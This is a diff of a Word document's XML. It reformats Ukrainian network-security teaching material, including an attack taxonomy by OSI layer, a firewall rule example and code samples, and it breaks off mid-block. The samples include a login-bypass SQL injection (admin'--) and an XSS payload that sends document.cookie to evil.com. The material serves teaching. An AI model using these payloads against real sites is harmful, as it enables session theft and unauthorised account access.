+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│      ├── Сканування вразливостей                                      │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│      └── DNS enumeration                                              │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ЗА РІВНЕМ OSI:                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── L2: ARP spoofing, MAC flooding                                   │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── L3: IP spoofing, ICMP attacks                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── L4: TCP/UDP attacks, port scanning                               │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  └── L7: SQL injection, XSS, CSRF                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="9"/>
     <w:bookmarkStart w:id="10" w:name="брандмауер-firewall"/>
@@ -576,174 +625,223 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│                    ЛОГІКА ПРАВИЛ БРАНДМАУЕРА                          │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  Правила перевіряються ПОСЛІДОВНО (зверху вниз)                       │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  Перше правило, що підходить, визначає долю пакета                    │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  Приклад набору правил:                                               │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  ┌─────────────────────────────────────────────────────────────────┐  │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │ 1. ALLOW TCP dst-port=443 (HTTPS)                               │  │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │ 2. ALLOW TCP dst-port=80  (HTTP)                                │  │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │ 3. ALLOW UDP dst-port=53  (DNS)                                 │  │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │ 4. ALLOW ICMP type=8      (ping request)                        │  │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  │ 5. DENY ALL               (все інше заборонено)                 │  │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  └─────────────────────────────────────────────────────────────────┘  │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│  Принцип: "Deny by default" — заборонено все, крім явно дозволеного   │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                    ЛОГІКА ПРАВИЛ БРАНДМАУЕРА                          │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Правила перевіряються ПОСЛІДОВНО (зверху вниз)                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Перше правило, що підходить, визначає долю пакета                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Приклад набору правил:                                               │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ┌─────────────────────────────────────────────────────────────────┐  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 1. ALLOW TCP dst-port=443 (HTTPS)                               │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 2. ALLOW TCP dst-port=80  (HTTP)                                │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 3. ALLOW UDP dst-port=53  (DNS)                                 │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 4. ALLOW ICMP type=8      (ping request)                        │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 5. DENY ALL               (все інше заборонено)                 │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  └─────────────────────────────────────────────────────────────────┘  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Принцип: "Deny by default" — заборонено все, крім явно дозволеного   │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="10"/>
     <w:bookmarkStart w:id="11" w:name="ids-та-ips"/>
@@ -1086,87 +1184,136 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">-- Вразливий код:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">SELECT * FROM users WHERE login='$input' AND pass='$pass'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">-- Атака:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">login: admin'--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">pass: anything</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">-- Результат:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">SELECT * FROM users WHERE login='admin'--' AND pass='anything'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">-- Коментар '--' ігнорує перевірку пароля</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">-- Вразливий код:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">SELECT * FROM users WHERE login='$input' AND pass='$pass'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">-- Атака:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">login: admin'--</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">pass: anything</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">-- Результат:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">SELECT * FROM users WHERE login='admin'--' AND pass='anything'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">-- Коментар '--' ігнорує перевірку пароля</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1182,60 +1329,109 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">&lt;!-- Вразливий код: --&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">&lt;p&gt;Привіт, &lt;?php echo $_GET['name']; ?&gt;&lt;/p&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">&lt;!-- Атака: --&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">?name=&lt;script&gt;document.location='http://evil.com/steal.php?c='+document.cookie&lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">&lt;!-- Результат: виконання JavaScript у браузері жертви --&gt;</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">&lt;!-- Вразливий код: --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">&lt;p&gt;Привіт, &lt;?php echo $_GET['name']; ?&gt;&lt;/p&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">&lt;!-- Атака: --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">?name=&lt;script&gt;document.location='http://evil.com/s.php?c='+document.cookie&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
